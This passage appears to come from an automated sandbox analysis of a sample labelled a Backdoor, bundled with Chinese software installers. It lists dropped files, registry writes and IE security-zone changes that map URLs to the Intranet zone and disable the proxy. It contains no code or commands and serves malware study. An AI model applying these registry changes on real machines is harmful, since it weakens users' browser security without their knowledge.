%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\main[1].ico (14676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\CABY0VJT.htm (3170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\Opendownloadernewxml[1].htm (899 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv097_28.exe.tmp (109915 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\Downloaderconfig[1].htm (948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\1[1].swf (46445 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\CAPOM59R.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\CAEZC16H.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\CAS9GHCZ.htm (1 bytes)
C:\temp.icon (14676 bytes)

The process Baidu.exe:3800 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Desktop\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\卸载百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\百度.lnk (1 bytes)

The process Baidu.exe:324 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerExe.exe (163689 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130892497314787500.dat (311 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db (145 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (0 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (0 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130892497314787500.dat (0 bytes)

The process KZMount.exe:1976 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%System%\drivers\KuaiZipDrive.sys (601 bytes)

The process 9158.exe:3180 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\ga[1].xml (636 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\49_2[1].gif (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\getinfo[1].htm (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\68_r_579[1].gif (49345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\3_3[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\Activity[1].ashx (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\31_s_21610[1].bmp (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\32_r_1710[1].gif (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\39_a_579[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\61_s_122010[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\log_close[1].bmp (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\log_min[1].bmp (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\8_a_22214[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\filter[1].zip (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\1_t_52312[1].gif (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\31_t_21610[1].gif (21953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\makefriend6.9[1].xml (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\38_a_12913[1].gif (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\15_2[1].gif (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\8_r_22214[1].gif (27121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\logbg[1].bmp (160113 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\get_list[1].htm (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\filter[1].zip (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\38_t_112316[1].gif (22009 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\10_1[1].gif (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\32_t_21411[1].gif (18121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\31_a_12417[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\67_t_72516[1].gif (25313 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\serverlist1[1].htm (3172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\9[1].gif (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\67_a_12613[1].gif (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\Fruit[1].xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\DynamicEffects[1].zip (2057837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\60_t_112310[1].gif (26633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\54[1].bmp (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\60_s_122010[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\9_3[1].gif (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\3_4[1].gif (8905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\8_t_22214[1].gif (29849 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\39_r_579[1].gif (27633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\28_s_72017[1].png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\28_t_72017[1].gif (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\1_r_579[1].gif (22009 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\15_s_122010[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\20_t_12216[1].gif (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\itemconfig[1].xml (6532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\68_s_122010[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\info[1].htm (7332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\3_2[1].gif (19969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\serverlist1[1].htm (3172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\31_r_12417[1].gif (15529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\Banner[1].xml (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\67_r_12613[1].gif (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\32_a_11117[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\15_3[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\getad4[2].htm (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\1_s_121915[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\54_t_122013[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\39_s_122010[1].png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\38_r_12913[1].gif (25729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\39_t_112310[1].gif (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\1_a_579[1].gif (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\29_s_122010[1].png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\2_s_121915[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\8_s_122010[1].png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\68_1[1].gif (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\10_s_122010[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\10_3[1].gif (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\16_s_122010[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\10_2[1].gif (64721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\20_s_112517[1].bmp (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LFXRV28Y\9_2[1].gif (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\32_s_21411[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\list[1].htm (121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\67_s_122010[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\38_s_122010[1].png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\29_5[1].gif (1177 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9NCYO61L\serverlist1[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\filter[1].zip (0 bytes)

The process 9158chat2_ktv097_28.exe:2072 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp (4 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\жÔØ 9158¶àÈËÊÓƵ.lnk (713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\9158¶àÈËÊÓƵ.lnk (705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓƵ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (923429 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\close.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\loading2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\checkbox1.bmp (0 bytes)

Registry activity

The process Kuaizip_Setup_7654_1061607.exe:1100 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"sfx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayIcon" = "%Program Files%\¿ìѹ\X86\Uninst.exe"

[HKCU\Software\KuaiZipSFX\¿ìѹ]
"ChannelID" = "7654_1061607"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"Mount.dll" = "0"

[HKCU\Software\SNDA]
"PCID" = "Je06b40e4c7ee2608455420c2f88bfbce23dd149dfac9bda3d4ac7875838d4269"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86\lang]
"Chs_Lang.dll" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"readme.txt" = "0"
"x86" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZMount.exe" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"BSCoreNew.dll" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayVersion" = "2.8.2.3"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"快压-压缩和解压缩利器.URL" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\¿ìѹ\X86]
"KZReport.exe" = "KZReport"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"ali" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"Publisher" = "上海广乐网络科技有限公司"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"SendEverBox" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\.zip\ShellNew]
"FileName" = "%Program Files%\¿ìѹ\zipnew.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayName" = "¿ìѹ"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"DuiLib.dll" = "0"
"KuaiZip.exe" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\¿ìѹ\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\ali]
"kzshop.ico" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\KuaiZip\Install]
"InstallCount" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\KuaiZipSFX\¿ìѹ]
"Version" = "2.8.2.3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\KuaiZip\Install]
"Path" = "%Program Files%\¿ìѹ\"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"lang" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"AppendMenu" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"data" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZFormat.dll" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"7zNew.dat" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"kuaizipUpdateChecker.dll" = "0"
"update.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 F2 2C D3 CA 70 01 A4 66 27 31 00 43 83 05 5A"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"SetupHelper.exe" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\¿ìѹ\X86]
"KuaiZip.exe" = "KuaiZip Application"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\ali]
"jp.png" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"StoreOnly" = "*.MPEG *.MPG *.DAT *.avi *.mov *.asf *.3gp *.mkv *.flv *.ra *.rm *.ram *.aiff *.au *.midi *.vqf *.ogg *.mid *.aac *.ape"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"DiskOpt.exe" = "0"
"7z.dll" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"SLDefault.xml" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\¿ìѹ\X86]
"update.exe" = "update process"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"finderlib.dll" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\¿ìѹ\X86]
"KZMount.exe" = "KZMount"

[HKCU\Software\KuaiZipSFX\¿ìѹ]
"Path" = "%Program Files%\¿ìѹ\"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"uninst.exe" = "0"

[HKCU\Software\KuaiZip\Install]
"InstallDate" = "151014"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Name" = "ѹËõ²¢Ãë´«·ÖÏí¸øºÃÓÑ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"UninstallString" = "%Program Files%\¿ìѹ\X86\Uninst.exe"
"InstallDate" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"MountCore.dll" = "0"

[HKCR\.7z\ShellNew]
"FileName" = "%Program Files%\¿ìѹ\7znew.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"LastUpdateDate" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"KzNew.dat" = "0"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"ExeImmi" = "1"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZipShell.dll" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZReport.exe" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"AT.exe" = "Schedule service command line interface"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"ZipNew.dat" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.kz\ShellNew]
"FileName" = "%Program Files%\¿ìѹ\KzNew.dat"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KZModule.dll" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\KuaiZip\Install]
"qid" = "7654_1061607"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86\sfx]
"kzSetup_chs.sfx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\X86]
"KuaiZipDrive.sys" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files\data]
"slimdata.dat" = "0"

[HKCU\Software\KuaiZipSFX\¿ìѹ\Files]
"ErrorMsg.xml" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\KuaiZip\Install]
"Version" = "2.8.2.3"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Default" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following value(s) in system registry:

